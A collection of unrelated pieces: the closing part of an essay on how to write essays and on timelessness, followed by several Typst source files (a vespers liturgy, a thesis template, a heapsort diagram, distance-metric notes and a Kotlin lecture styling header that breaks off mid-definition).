essays makes it as if the space of ideas were more highly connected.When a subtree comes to an end, you can do one of two things. You
can either stop, or pull the Cubist trick of laying separate subtrees
end to end by returning to a question you skipped earlier. Usually
it requires some sleight of hand to make the essay flow continuously
at this point, but not this time. This time I actually need an
example of the phenomenon. For example, we discovered earlier that
the best possible essay wouldn't usually be timeless in the way the
best painting would. This seems surprising enough to be
worth investigating further.There are two senses in which an essay can be timeless: to be about
a matter of permanent importance, and always to have the same effect
on readers. With art these two senses blend together. Art that
looked beautiful to the ancient Greeks still looks beautiful to us.
But with essays the two senses diverge, because essays
teach, and you can't teach people something they already know.
Natural selection is certainly a matter of permanent importance,
but an essay explaining it couldn't have the same effect on us that
it would have had on Darwin's contemporaries, precisely because his
ideas were so successful that everyone already knows about them.
[10]I imagined when I started writing this that the best possible essay
would be timeless in the stricter, evergreen sense: that it would
contain some deep, timeless wisdom that would appeal equally to
Aristotle and Feynman. That doesn't seem to be true. But if the
best possible essay wouldn't usually be timeless in this stricter
sense, what would it take to write essays that were?The answer to that turns out to be very strange: to be the evergreen
kind of timeless, an essay has to be ineffective, in the sense that
its discoveries aren't assimilated into our shared culture. Otherwise
there will be nothing new in it for the second generation of readers.
If you want to surprise readers not just now but in the future as
well, you have to write essays that won't stick — essays that,
no matter how good they are, won't become part of what people in
the future learn before they read them.
[11]I can imagine several ways to do that. One would be to write about
things people never learn. For example, it's a long-established
pattern for ambitious people to chase after various types of prizes,
and only later, perhaps too late, to realize that some of them
weren't worth as much as they thought. If you write about that, you
can be confident of a conveyor belt of future readers to be surprised
by it.Ditto if you write about the tendency of the inexperienced to overdo
things — of young engineers to produce overcomplicated solutions,
for example. There are some kinds of mistakes people never learn
to avoid except by making them. Any of those should be a timeless
topic.Sometimes when we're slow to grasp things it's not just because
we're obtuse or in denial but because we've been deliberately lied
to. There are a lot of things adults lie
to kids about, and when
you reach adulthood, they don't take you aside and hand you a list
of them. They don't remember which lies they told you, and most
were implicit anyway. So contradicting such lies will be a source
of surprises for as long as adults keep telling them.Sometimes it's systems that lie to you. For example, the educational
systems in most countries train you to win by
hacking the test. But
that's not how you win at the most important real-world tests, and
after decades of training, this is hard for new arrivals in the real
world to grasp. Helping them overcome such institutional lies will
work as long as the institutions remain broken.
[12]Another recipe for timelessness is to write about things readers
already know, but in much more detail than can be transmitted
culturally. "Everyone knows," for example, that it can be rewarding
to have kids. But till you have them you don't know precisely what
forms that takes, and even then much of what you know you may never
have put into words.I've written about all these kinds of topics. But I didn't do it
in a deliberate attempt to write essays that were timeless in the
stricter sense. And indeed, the fact that this depends on one's ideas
not sticking suggests that it's not worth making a deliberate attempt
to. You should write about topics of timeless importance, yes, but
if you do such a good job that your conclusions stick and future
generations find your essay obvious instead of novel, so much the
better. You've crossed into Darwin territory.Writing about topics of timeless importance is an instance of
something even more general, though: breadth of applicability. And
there are more kinds of breadth than chronological — applying to
lots of different fields, for example. So breadth is the ultimate
aim.I already aim for it. Breadth and novelty are the two things I'm
always chasing. But I'm glad I understand where timelessness fits.I understand better where a lot of things fit now. This essay has
been a kind of tour of essay writing. I started out hoping to get
advice about topics; if you assume good writing, the only thing
left to differentiate the best essay is its topic. And I did get
advice about topics: discover natural selection. Yeah, that would
be nice. But when you step back and ask what's the best you can do
short of making some great discovery like that, the answer turns
out to be about procedure. Ultimately the quality of an essay is a
function of the ideas discovered in it, and the way you get them
is by casting a wide net for questions and then being very exacting
with the answers.The most striking feature of this map of essay writing are the
alternating stripes of inspiration and effort required. The questions
depend on inspiration, but the answers can be got by sheer persistence.
You don't have to get an answer right the first time, but there's
no excuse for not getting it right eventually, because you can keep
rewriting till you do. And this is not just a theoretical possibility.
It's a pretty accurate description of the way I work. I'm rewriting
as we speak.But although I wish I could say that writing great essays depends mostly
on effort, in the limit case it's inspiration that makes the
difference. In the limit case, the questions are the harder thing
to get. That pool has no bottom.How to get more questions? That is the most important question of
all.Notes[1]
There might be some resistance to this conclusion on the
grounds that some of these discoveries could only be understood by
a small number of readers. But you get into all sorts of difficulties
if you want to disqualify essays on this account. How do you decide
where the cutoff should be? If a virus kills off everyone except a
handful of people sequestered at Los Alamos,
could an essay that had been disqualified now be eligible? Etc.Darwin's 1844 essay was derived from an earlier version written in 1839.
Extracts from it were published in 1858.[2]
When you find yourself very curious about an apparently minor
question, that's an exciting sign. Evolution has designed you to
pay attention to things that matter. So when you're very curious
about something random, that could mean you've unconsciously noticed
it's less random than it seems.[3]
Corollary: If you're not intellectually honest, your writing
won't just be biased, but also boring, because you'll miss all the
ideas you'd have discovered if you pushed for the truth.[4]
Sometimes this process begins before you start writing.
Sometimes you've already figured out the first few things you want
to say. Schoolchildren are often taught they should decide everything
they want to say, and write this down as an outline before they
start writing the essay itself. Maybe that's a good way to get them
started — or not, I don't know — but it's antithetical to the
spirit of essay writing. The more detailed your outline, the less
your ideas can benefit from the sort of discovery that essays are for.[5]
The problem with this type of "greedy" algorithm is that you
can end up on a local maximum. If the most valuable question is
preceded by a boring one, you'll overlook it. But I can't imagine
a better strategy. There's no lookahead except by writing. So use
a greedy algorithm and a lot of time.[6]
I ended up reattaching the first 5 of the 17 paragraphs, and
discarding the rest.[7]
<NAME> confessed to making use of this phenomenon when
taking exams at Oxford. He had in his head a standard essay about
some general literary topic, and he would find a way to turn the
exam question toward it and then just reproduce it again.Strictly speaking it's the graph of ideas that would be highly
connected, not the space, but that usage would confuse people who
don't know graph theory, whereas people who do know it will get
what I mean if I say "space".[8]
Too far doesn't depend just on the distance from the original
topic. It's more like that distance divided by the value of whatever
I've discovered in the subtree.[9]
Or can you? I should try writing about this. Even if the
chance of succeeding is small, the expected value is huge.[10]
There was a vogue in the 20th century for saying that the
purpose of art was also to teach. Some artists tried to justify
their work by explaining that their goal was not to produce something
good, but to challenge our preconceptions about art. And to be fair,
art can teach somewhat. The ancient Greeks' naturalistic sculptures
represented a new idea, and must have been extra exciting to
contemporaries on that account. But they still look good to us.[11]
<NAME> caused huge controversy in the early 20th
century with his ideas about "trial marriage." But they make boring
reading now, because they prevailed. "Trial marriage" is what we
call "dating."[12]
If you'd asked me 10 years ago, I'd have predicted that schools
would continue to teach hacking the test for centuries. But now it
seems plausible that students will soon be taught individually by
AIs, and that exams will be replaced by ongoing, invisible
micro-assessments.Thanks to <NAME>, <NAME>,
<NAME>, <NAME>, <NAME>, and <NAME> for reading drafts of
this.
|
|
https://github.com/Kasci/LiturgicalBooks | https://raw.githubusercontent.com/Kasci/LiturgicalBooks/master/CSL_old/casoslov/velkaVecierenBezKnaza.typ | typst | #import "../../style.typ": *
#import "/CSL/texts.typ": *
#import "../styleCasoslov.typ": *
= Velikaja večerňa <X>
#show: rest => columns(2, rest)
#nacaloBezKnaza
#include "../zalmy/Z103.typ"
#si
#lettrine("Allilúia, allilúia, allilúia. Sláva tebí, Bóže.") #primText[(3x)]
#ektenia(12)
#note[Nasleduje predpísaná katizma alebo Blažen muž:]
#lettrine("Blažén múž, alliluja, íže ne íde na sovít nečestívych, alliluja.")
#lettrine("Jáko vísť Hospóď púť právednych, i púť nečestívych pohíbnet, alliluja.")
#lettrine("Rabótajte Hóspodevi so stráchom i rádujtesja jemú so trépetom, alliluja.")
#lettrine("Blažéni vsi nacfíjuščiisja naň, vsi nadijuščiisja naň, alliluja.")
#lettrine("Voskresní, Hóspodi, spasí mja Bože moj, alliluja.*")
#lettrine("Hóspodi, čtósja umnóžiša stužájuščii mi, alliluja.*")
#lettrine("Hóspodne jesť spaséníje i na lúdech tvoích blahoslovénije tvoje, alliluja.")
#lettrine("Sláva: I nýňi: Alliluja.")
#ektenia(3)
#header[Hóspodi, vozzvách]
Hóspodi, vozvách k tebí uslýši mja, \* uslýši mja Hóspodi. \* Hóspodi, vozvách k tebí uslýši mja, \* voňmí hlásu molénija mojehó, \* vnehdá vozváti mi k tebí, uslýši mja, Hóspodi.
Da isprávitsja molítva mojá \* jáko kadílo préd tobóju: \* vozďijánije rukú mojéju, \* žértva večérňaja, uslýší mjá Hóspodi.
#include "../zalmy/Z_PaneJaVolam.typ"
#verse((
"Izvedí iz temnícy dúšu mojú, ispovídatisja ímeni tvojemú.",
"Mené ždút právednicy, dóndeže vozdási mňi.",
"Iz hlubiný vozvách k tebí Hóspodi, Hóspodi uslýši hlas moj.",
"Da búdut úši tvojí vnémľušči hlásu molénija mojehó.",
"Ašče bezzakónija nazriši Hóspodi, Hóspodi kto postojít, jáko u tebé očiščénije jesť.",
"Imené rádi tvojehó poterpích ťa Hóspodi, poterpí dušá mojá vo slóvo tvojé, upová dušá mojá na Hóspoda.",
"Ot stráži útrenija do nóšči, ot stráži útrénija da upovájet Isrájiľ na Hóspoda.",
"Jáko u Hóspoda mílosť i mnóhoje u ného izbavlénije, i toj izbávit isrájiľa ot vsich bezzakónij jehó.",
"Chvalíte Hóspoda vsi jazýcy, pochvalíte jehó vsi ľúdije.",
"Jáko utverdísja mílosť jehó na nás, i ístina Hospódňa prebyvájet vo vík."
))
#header[Svíte tíchij]
#lettrine("Svíte tíchij, * svjatýja slávy, * bezsmértnaho Otcá nebésnaho, * svjatáho blažénnaho, * Iisúse Christé: * Prišédše sólnca na západ, * víďivše svít večérnij, * pojém Otcá i Sýna i svjatáho Dúcha Bóha. * Dostójin jesí * vo vsja vremená, * pít býti * hlásy prepodóbnými, * Sýne Bóžij, * živót dajáj vsemú míru, * jehóže rádi * vés mír slávit ťa.")
#header[Prokimen]
#note[Nedeľa - Sobota večer, 6. hlas]
#lettrine("Hóspoď vocarísja, v ľipótu oblečesja.")
#vers[Oblečesja Hóspoď v sílu i prepojásasja]
#vers[Íbo utverdí vselénnuju, jaže ne podvížitsja.]
#vers[Dómu tvojemú podobajet svjatýňa, Hóspodi, v dolhotú dníj.]
#note[Alebo berieme predpísaný prokimen sviatku.]
#header[Čténia]
#note[Berieme čítania ak sú:]
#ektenia(40)
#header[Spodóbi, Hóspodi]
#lettrine("Spodóbi, Hóspodi, vo véčer sej, * bez hrichá sochranitísja nám. - Blahoslovén jesí, Hóspodi, Bóže otéc nášich, * i chváľno i proslávlenno ímja tvojé vo víki, amíň. - Búdi, Hóspodi, mílosť tvojá na nas, * jákože upováchom na ťa. - Blahoslovén jesí, Hóspodi, * naučí nas opravdánijem tvojím. - Blahoslovén jesí, Vladýko, * vrazúmi nas opravdánijem tvojím. - Blahoslovén jesí, Svjatýj, * prosvití nás opravdániji tvojími. - Hóspodi, mílosť tvojá vo vik, * ďíl rukú tvojéju ne prezri. - Tebí podobájet chvalá, * tebí podobájet pínije. - Tebí sláva podobájet * Otcú i Sýnu i svjatómu Dúchu. - Nýňi i prísno, * i vo víki vikóv, amíň.")
#ektenia(12)
#header[Stichiry na litii]
#note[Ak je predpísaná lítia, modlíme sa lítijné slohy]
#ektenia(120)
#header[Stichíry na stichovňi]
#slohy((
"Hospóď vocarísja, v ľípotu oblečésja.",
"Íbo utverdí vselénnuju jáže ne podvížitsja.",
"Dómu tvojemú podobájet svjatýňa Hóspodi, v dolhotú dnij."
))
#header[Molitva Simeona]
#lettrine("Nýňi otpuščáješi rabá tvojehó, Vladýko, * po hlahólu tvojemú s mírom. * Jáko víďista oči mojí spasénije tvojé, * jéže jesí uhotovál pred licém vsich ľudéj. * Svít vo otkrovénije jazýkov * i slávu ľudéj tvojích Ísraiľa")
#trojsvatePoOtcenas
#header[Tropar]
#note[Berieme tropáre zakončené Bohorodičníkom:]
#include "../zalmy/Z33_vecieren.typ"
#prepustenieBezKnaza |
|
https://github.com/kotatsuyaki/canonical-nthu-thesis | https://raw.githubusercontent.com/kotatsuyaki/canonical-nthu-thesis/main/lib.typ | typst | MIT License | #import "pages/zh-cover.typ": zh-cover-page
#import "pages/en-cover.typ": en-cover-page
#import "pages/outlines.typ": outline-pages
#import "layouts/preface.typ": preface-impl
#import "layouts/body.typ": body-impl
#import "layouts/doc.typ": doc-impl
#let cover-pages-impl(info: (:), style: (:)) = {
zh-cover-page(info: info, style: style)
en-cover-page(info: info)
}
#let setup-thesis(
info: (:),
style: (:),
) = {
// The default values for info.
info = (
degree: "master",
title-zh: [一個標題有點長的 \ 有趣的研究],
title-en: [An Interesting Research \ With a Somewhat Long Title],
department-zh: "某學系",
department-en: "Mysterious Department",
id: "012345678",
author-zh: "張三",
author-en: "<NAME>",
supervisor-zh: "李四 教授",
supervisor-en: "Prof. <NAME>",
// TODO: Revisit this when Typst support displaying datetime in non-English languages.
year-zh: "一一三",
month-zh: "七",
date-en: "July 2024",
keywords-zh: ("關鍵詞", "列表", "範例"),
keywords-en: ("example", "keywords", "list"),
) + info
// The default values for style.
style = (
// Margin sizes for all non-cover pages.
margin: (top: 1.75in, left: 2in, right: 1in, bottom: 2in),
// The fonts used throughout the thesis.
fonts: ("New Computer Modern", "TW-MOE-Std-Kai"),
// The math equation fonts used throughout the thesis.
math-fonts: ("New Computer Modern"),
// Whether to show a list of tables in the `outline-pages()` function.
outline-tables: true,
// Whether to show a list of figures in the `outline-pages()` function.
outline-figures: true,
// Whether to show the text "Draft version" and the date on the margin.
show-draft-mark: false,
// The row heights of the Chinese cover page.
cover-row-heights: (30pt, 30pt, 30pt),
) + style
return (
doc: doc-impl.with(info: info, style: style, show-draft-mark: style.show-draft-mark),
cover-pages: cover-pages-impl.with(info: info, style: style),
preface: preface-impl.with(margin: style.margin),
outline-pages: outline-pages.with(
outline-tables: style.outline-tables,
outline-figures: style.outline-figures,
),
body: body-impl.with(margin: style.margin),
)
}
|
https://github.com/noahjutz/AD | https://raw.githubusercontent.com/noahjutz/AD/main/notizen/sortieralgorithmen/heapsort/heapify_step_0.typ | typst | #import "/components/lefttree.typ": lefttree, draw_node, note, connect, bent_line, fade
#import "@preview/cetz:0.3.0"
#cetz.canvas({
import cetz.draw: *
import cetz.tree: tree
tree(
lefttree((34, 45, 38).map(n => str(n))),
draw-node: draw_node.with(hl_primary: 0),
spread: 2,
name: "tree"
)
note(0, ang: 0deg)[root]
note(1, ang: 180deg)[largest]
connect(
0, 1,
bent_line.with(bend: -.5, mark: (symbol: ">"))
)
fade(1, ang: -45deg)
fade(2, ang: -45deg)
fade(1, ang: 225deg)
fade(2, ang: 225deg)
}) |
|
https://github.com/chamik/gympl-skripta | https://raw.githubusercontent.com/chamik/gympl-skripta/main/cj-autori/sverak-smoljak.typ | typst | Creative Commons Attribution Share Alike 4.0 International | #import "/helper.typ": autor
#autor("<NAME>", "1936", "", "režisér a scénárista", "učitelství češtiny", "novodobý", "/cj-autori/media/sverak.jpg")
#autor("<NAME>", "1931", "2010 (78 let)", "režisér a scénárista", "učitelství matematiky a fyziky", "novodobý", "/cj-autori/media/smoljak.jpg")
Oba pracovali ve filmových studiích Barrandov. Režírovali spolu filmy Jáchyme hoď ho do stroje, Marečku podejte mi pero, Na samotě u lesa a Cimrmana.
Svěrák má 2 české lvy, medaily za zásluhy ČR a spolu s jeho synem Oscara za film Kolja. Je spoluzakladatel divadla <NAME>. Napsal knížku o Smoljakovi jménem "<NAME>, hrající bdící". Soudil se hodně dlouho s Bauhausem (udělali reklamu s textem "upeč třeba zeď") a nakonec vyhrál. Založil #underline[Centrum Paraple] pro lidi s poraněním míchy.
Smoljak byl redaktor Mladé fronty. Podílel se na vytvoření ankety Zlatý slavík. Byl politicky angažovaný. Režisér divadelního spolku.
První hra v divadle J. C. byla "Akt" v roce 1967. V tomto divadle se hrají pouze autorská díla.
Svěrák písničky: Mravenčí ukolébavka, Není nutno (Tři veteráni), Dělání a Statistika (Princové jsou na draka), Když se zamiluje kůň, "taková ta narozeninová" ("X má narozeniny, my máme přání jediný"), Hajný je lesa pán... většina složená s Uhlířem.
Smoljak hry: Hymna aneb Urfidlovačka, Malý říjen
*Současníci*\
_<NAME>_ -- písničky pro děti\
_<NAME>_ (syn) -- spolupráce na filmech (Kolja, Vratné lahve, Kuki se vrací)\
_<NAME>_ -- spoluzakladatel divadla <NAME>mana
#pagebreak() |
https://github.com/alberto-lazari/computer-science | https://raw.githubusercontent.com/alberto-lazari/computer-science/main/advanced-topics-cs/quantum-algorithms/chapters/deepening.typ | typst | #import "/common.typ": *
= Shor's factorization algorithm
An interesting quantum algorithm, that brings great performance improvements and has real-world implications is Shor's integer factorization algorithm.
== Classical integer factorization
Factorizing an integer $n$ is generally intractable on classical computational models, since the fastest known algorithm has a sub-exponential complexity of $O(e^((log n)^(1/3) (log log n)^(2/3)))$.
Many cryptography-related algorithms and protocols exploit this fact to ensure (algorithmically)-unbreakable encryption.
== Quantum factorization
Shor's algorithm provides an exponential speedup over classical approaches: it uses a number of quantum gates of order $O((log n)^2 (log log n) (log log log n))$.
The high-level steps of Shor's algorithm are:
+ The problem of finding $n$'s integer factors is reduced to finding the period of a function
$f(x) = a^x "mod" n$.
The objective is finding the smallest positive integer $r$, such that $a^r equiv 1 "mod" n$, $r$ being the period of $f$
+ Quantum phase estimation process: applies modular exponentiation and the inverse QFT to a uniform superposition of all possible states (initialized with a H gate)
+ Post processing process: uses the period $r$ to find the factorization of $n$
== Implications
Implementing this quantum algorithm would lead to severe consequences in a big section of current cryptography and cyber security in general.
It could be used to break various cryptography mechanisms, like private/public-key schemes, most notably:
- The RSA algorithm
- Diffie-Hellman key exchange
However, current quantum computers seem to lack a sufficient number of qubits and results are not so stable due to noise and errors, for Shor's algorithm to pose a serious threat in real-world scenarios.
|
|
https://github.com/jgm/typst-hs | https://raw.githubusercontent.com/jgm/typst-hs/main/test/typ/compiler/return-00.typ | typst | Other | // Test return with value.
#let f(x) = {
return x + 1
}
#test(f(1), 2)
|
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/visualize/stroke_00.typ | typst | Apache License 2.0 |
#import "/contrib/templates/std-tests/preset.typ": *
#show: test-page
// Some simple test lines
#line(length: 60pt, stroke: red)
#v(3pt)
#line(length: 60pt, stroke: 2pt)
#v(3pt)
#line(length: 60pt, stroke: blue + 1.5pt)
#v(3pt)
#line(length: 60pt, stroke: (paint: red, thickness: 1pt, dash: "dashed"))
#v(3pt)
#line(length: 60pt, stroke: (paint: red, thickness: 4pt, cap: "round"))
|
https://github.com/GYPpro/ACM_res | https://raw.githubusercontent.com/GYPpro/ACM_res/main/0_Template/geo/Distance.typ | typst | #import "@preview/codelst:2.0.1": sourcecode
// Display inline code in a box
#set text(font:("Times New Roman","Source Han Serif SC"))
#show raw.where(block: false): box.with(
fill: luma(230),
inset: (x: 3pt, y: 0pt),
outset: (y: 3pt),
radius: 2pt,
)
#show raw.where(block: true): block.with(
fill: luma(240),
inset: 10pt,
radius: 4pt,
)
#show raw: set text(
font: ("consolas", "Source Han Serif SC")
)
#set page(
// flipped: true,
// background: [#image("background.png")]
paper: "a4",
)
#set text(
font:("Times New Roman","Source Han Serif SC"),
style:"normal",
weight: "regular",
size: 13pt,
)
#show math.equation:set text(font:("New Computer Modern Math","Source Han Serif SC"))
#let nxtIdx(name) = box[ #counter(name).step()#counter(name).display()]
#set math.equation(numbering: "(1)")
#set page(
paper:"a4",
number-align: right,
margin: (x:2cm,y:2.5cm),
header: [
#box(baseline:5pt)[#set text(
size: 11pt,
)
#align(
left+bottom,
[
#smallcaps[ ]
#h(1fr)#text(" ",fill:rgb("#898989"));
]
)]
#line(start: (0pt,-10pt),end:(483pt,-10pt))
],
numbering: "1/1"
)
#set math.mat(delim: "[")
#set math.vec(delim: "[")
#set page(
paper:"a4",
number-align: right,
margin: (x:2cm,y:2.5cm),
header: [
#box(baseline:5pt)[#set text(
size: 11pt,
)
#align(
left+bottom,
[
#smallcaps[Templetes]
#h(1fr)#text("Github GYPpro/Acm_res",fill:rgb("#898989"));
]
)]
#line(start: (0pt,-10pt),end:(483pt,-10pt))
],
numbering: "1/1"
)
///MAIN---MAIN///
=== 曼哈顿距离
$ d(A,B) = |x_1 - x_2| + |y_1 - y_2| $
=== 欧几里得距离
$ d(A,B) = sqrt((x_1 - x_2)^2 + (y_1 - y_2)^2) $
=== 切比雪夫距离
$ d(A,B) = max(|x_1 - x_2|, |y_1 - y_2|) $
=== 闵可夫斯基距离
$ d(A,B) = (|x_1 - x_2|^p + |y_1 - y_2|^p)^{1/p} $
=== 曼哈顿转切比雪夫
对于直角坐标中的$A(x_1,y_1),B(x_2,y_2)$
其曼哈顿距离
$ d(A,B) = max(|(x_1+y_1) - (x_2+y_2)|,|(x_1-y_1)-(x_2-y_2|)) $
即为点$A'(x_1+y_1,x_1-y_1),B'(x_2+y_2,x_2-y_2)$的切比雪夫距离。
同理,其切比雪夫距离
$ d(A,B) = max(|(x_1+y_1)/2-(x_2+y_2)/2| + |(x_1-y_1)/2-(x_2-y_2)/2|) $
即为点$A'((x_1+y_1)/2,(x_1-y_1)/2),B'((x_2+y_2)/2, (x_2-y_2)/2)$的曼哈顿距离。
综上:
$
"曼哈顿距离" & =>"切比雪夫距离:" \
(x,y) & => (x+y,x-y) \
"切比雪夫距离"&=>"曼哈顿距离:"\
(x,y) &=> ((x+y)/2,(x-y)/2) $ |
|
https://github.com/jgm/typst-hs | https://raw.githubusercontent.com/jgm/typst-hs/main/test/typ/layout/grid-1-01.typ | typst | Other | #set rect(inset: 0pt)
#grid(
columns: (auto, auto, 40%),
column-gutter: 1fr,
row-gutter: 1fr,
rect(fill: eastern)[dddaa aaa aaa],
rect(fill: green)[ccc],
rect(fill: rgb("dddddd"))[aaa],
)
|
https://github.com/LDemetrios/ProgLectures | https://raw.githubusercontent.com/LDemetrios/ProgLectures/main/kotlinheader.typ | typst | #import "@local/ldemetrios-commons:0.1.0" : * // https://github.com/LDemetrios/LDemetrios-Typst-Commons
//////////// Icons
#let JVM = [#box[#pad(bottom:-0.2em)[#image(height: 1.2em, "JVM icon.png")]] *JV**M*]
#let Kotlin = [ #box[#pad(bottom:-0.05em,right: -0.3em)[#image(height: 0.8em, "Kotlin.png")]] otlin]
#let IEEE = [ #box[#pad(bottom:-0.3em,right: -0.3em)[#image(height: 1.2em, "IEEE.png")]] `I``E``E``E`]
//////////// Styling
#let dev-mode = "dev-mode"
#let rel-mode = "rel-mode"
#let print-mode = "print-mode"
#let mode = rel-mode
#let code-color = if (mode == print-mode) { black } else if (mode == dev-mode) { white } else { rgb("#002583") }
#let foreground = if (mode == print-mode) { black } else if (mode == dev-mode) { white } else { black }
#let background = if (mode == print-mode) { white } else if (mode == dev-mode) { black } else { white }
#let comment-back = if (mode == print-mode) { white } else if (mode == dev-mode) { black } else { luma(230) }
//////////// Standard types
#let kttype(s) = raw(s, lang: "kt")
#let KtBool = kttype("Boolean")
#let KtByte = kttype("Byte")
#let KtShort = kttype("Short")
#let KtInt = kttype("Int")
#let KtLong = kttype("Long")
#let KtChar = kttype("Char")
#let KtFloat = kttype("Float")
#let KtDouble = kttype("Double")
#let KtString = kttype("String")
#let KtUnit = kttype("Unit")
#let KtNothing = kttype("Nothing")
#let KtBool7 = kttype("Boolean?")
#let KtByte7 = kttype("Byte?")
#let KtShort7 = kttype("Short?")
#let KtInt7 = kttype("Int?")
#let KtLong7 = kttype("Long?")
#let KtChar7 = kttype("Char?")
#let KtFloat7 = kttype("Float?")
#let KtDouble7 = kttype("Double?")
#let KtString7 = kttype("String?")
#let KtUnit7 = kttype("Unit?")
#let KtNothing7 = kttype("Nothing?")
#let KtStar = kttype("*")
#let Any = kttype("Any")
#let Array(of) = kttype("Array<" + of.text + ">")
#let List(of) = kttype("List<" + of.text + ">")
#let MutableList(of) = kttype("MutableList<" + of.text + ">")
#let Pair(f, s) = kttype("Pair<" + f.text + ", " + s.text + ">")
#let Comparable(of) = kttype("Comparable<" + of.text + ">")
//////////// Paragraph styling
#let join-raw(code) = {
let i = 0
while i < code.len() {
i += 1
raw(code.at(i - 1))
}
}
#let raw-rule(code) = join-raw(code.text)
#let datatype(text) = join-raw(text)
#let static-function(text) = join-raw(text)
#let ext-function(text) = join-raw(text)
#let kt-keyword(txt) = text(fill: rgb("#0033b3"), join-raw(txt))
#let kt-literal(lit, typ) = if (typ == KtInt) {
text(fill: rgb("#1750eb"), join-raw(lit))
} else if (typ == KtLong) {
text(fill: rgb("#1750eb"), join-raw(lit))
} else if (typ == KtChar) {
text(fill: rgb("#017C01"), join-raw(lit))
} else if (typ == KtString) {
text(fill: rgb("#017C01"), join-raw(lit))
} else if (typ == KtDouble) {
text(fill: rgb("#1750eb"), join-raw(lit))
} else if (typ == KtBool) {
text(fill: rgb("#0033b3"), join-raw(lit))
} else if (typ == KtUnit) {
text(fill: rgb("#000000"), join-raw(lit))
} else [
#text(fill: foreground, join-raw(lit))
]
//////////// Custom styles
#let indent(body) = par(first-line-indent: 10pt, hanging-indent: 10pt, body)
#let comment(body) = rect(
width: 100%,
fill: comment-back,
stroke: (paint: black, thickness: 1pt),
radius: 10pt,
inset: 7%,
outset: -3%,
[\ #body\ \ ],
)
#let strikeleft(body) = tablex(
columns: 3,
align: left + horizon,
auto-hlines: false,
auto-vlines: false,
[],
vlinex(start: 0, end: 1, stroke: black + 2pt),
[],
body,
)
#let nobreak(body) = block(breakable: false, body)
//////////// Code sample blocks
#let kt(code) = [
#show regex(
"\b(var|null|if|else|fun|val|do|while|object|class|interface|return|break|continue|throw|lateinit|as|is|in|for|true|false|data|companion|infix|operator|override|public|private|protected|inline|internal|constructor|import|abstract|open)\b",
) : (it) => text(weight: "bold"/*, fill:rgb(0, 127, 255)*/, it)
#show regex("\"([^\"]*|\\[\"\\ntrf$])\"") : (it) => text(fill: rgb("#017C01"), it)
#show regex("'([ -~]|\\[\\\"nrtf]|\\\\u[0-9a-fA-F]{4})'") : (it) => text(fill: rgb("#017C01"), it)
#show regex("\b-?[0-9]+(\.[0-9]+([eE][+-]?[0-9]+)?)?\b") : (it) => text(fill: rgb("#1750eb"), it)
#show regex("//[^\n]*") : (it) => text(fill: rgb("#7F7F7F"), it)
#show regex("(?ms)/\*([^\*]|\*[^/]|\n|\r)*\*/") : (it) => text(fill: rgb("#7F7F7F"), it)
#text(fill: code-color, raw(code.text))
]
#let kt-eval(code) = [
#indent(kt(code))
]
#let kt-eval-noret(code) = [
#indent(kt(code))
]
#let kt-eval-append(code) = [
#indent(kt(code))
]
#let kt-eval-append-noret(code) = [
#indent(kt(code))
]
#let kt-res(code, typ) = [
#indent[`=> : `*#raw(typ.text)*` = `#kt-literal(code.text, typ)]
]
#let kt-print(code) = [
#indent(text(fill: rgb("#017C01"), raw(code.text)))
]
#let kt-comp-err(err) = [
#indent(text(fill: rgb("#FA3232"), raw(err.text)))
]
#let kt-runt-err(err) = [
#indent(text(fill: rgb("#FA3232"), raw(err.text)))
]
#let kt-par(body) = [
#show regex("\bNothing\?") : datatype("Nothing?")
#show regex("\bNothing\b") : datatype("Nothing")
#show regex("\bInt\?") : datatype("Int?")
#show regex("\bInt\b") : datatype("Int")
#show regex("\bLong\?") : datatype("Long?")
#show regex("\bLong\b") : datatype("Long")
#show regex("\bShort\?") : datatype("Short?")
#show regex("\bShort\b") : datatype("Short")
#show regex("\bByte\?") : datatype("Byte?")
#show regex("\bByte\b") : datatype("Byte")
#show regex("\bChar\?") : datatype("Char?")
#show regex("\bChar\b") : datatype("Char")
#show regex("\bFloat\?") : datatype("Float?")
#show regex("\bFloat\b") : datatype("Float")
#show regex("\bDouble\?") : datatype("Double?")
#show regex("\bDouble\b") : datatype("Double")
#show regex("\bAny\?") : datatype("Any?")
#show regex("\bAny\b") : datatype("Any")
#show regex("\bString\?") : datatype("String?")
#show regex("\bString\b") : datatype("String")
#show regex("\bUnit\?") : datatype("Unit?")
#show regex("\bUnit\b") : datatype("Unit")
#show regex("\bNumber\?") : datatype("Number?")
#show regex("\bNumber\b") : datatype("Number")
#show regex("\bBoolean\?\b") : datatype("Boolean?")
#show regex("\bBoolean\b") : datatype("Boolean")
//
#show regex("\bprint\b") : static-function("print")
#show regex("\bprintln\b") : static-function("println")
//
#show regex("\bval\b") : kt-keyword("val")
#show regex("\bvar\b") : kt-keyword("var")
#show regex("\bdo\b") : kt-keyword("do")
#show regex("\bwhile\b") : kt-keyword("while")
#show regex("\bif\b") : kt-keyword("if")
#show regex("\belse\b") : kt-keyword("else")
#show regex("\bfun\b") : kt-keyword("fun")
#show regex("\bobject\b") : kt-keyword("object")
#show regex("\bclass\b") : kt-keyword("class")
#show regex("\binterface\b") : kt-keyword("interface")
#show regex("\breturn\b") : kt-keyword("return")
#show regex("\bbreak\b") : kt-keyword("break")
#show regex("\bcontinue\b") : kt-keyword("continue")
#show regex("\bthrow\b") : kt-keyword("throw")
#show regex("\bnull\b") : kt-keyword("null")
#show regex("\blateinit\b") : kt-keyword("lateinit")
#show regex("\bdata\b") : kt-keyword("data")
#show regex("\bcompanion\b") : kt-keyword("companion")
#show regex("\bthis\b") : kt-keyword("this")
#show regex("\binfix\b") : kt-keyword("infix")
#show regex("\boperator\b") : kt-keyword("operator")
#show regex("\boverride\b") : kt-keyword("override")
#show regex("\bpublic\b") : kt-keyword("public")
#show regex("\bprivate\b") : kt-keyword("private")
#show regex("\bprotected\b") : kt-keyword("protected")
#show regex("\binline\b") : kt-keyword("inline")
#show regex("\binternal\b") : kt-keyword("internal")
#show regex("\bconstructor\b") : kt-keyword("constructor")
#show regex("\bas\b") : kt-keyword("as")
#show regex("\bis\b") : kt-keyword("is")
#show regex("\bimport\b") : kt-keyword("import")
#show regex("\babstract\b") : kt-keyword("abstract")
#show regex("\bopen\b") : kt-keyword("open")
//constructor
// #show regex("[0-9]{2,}") : (num) => kt-literal(num.text)
//
#show regex("\bstdout\b") : join-raw("stdout")
#show regex("\bstderr\b") : join-raw("stderr")
#show regex("\bstdin\b") : join-raw("stdin")
//#show "Kotlin" : Kotlin
//#show "JVM" : JVM
//#show "IEEE" : IEEE
#body
]
#let kt-paper-rule(body) = [
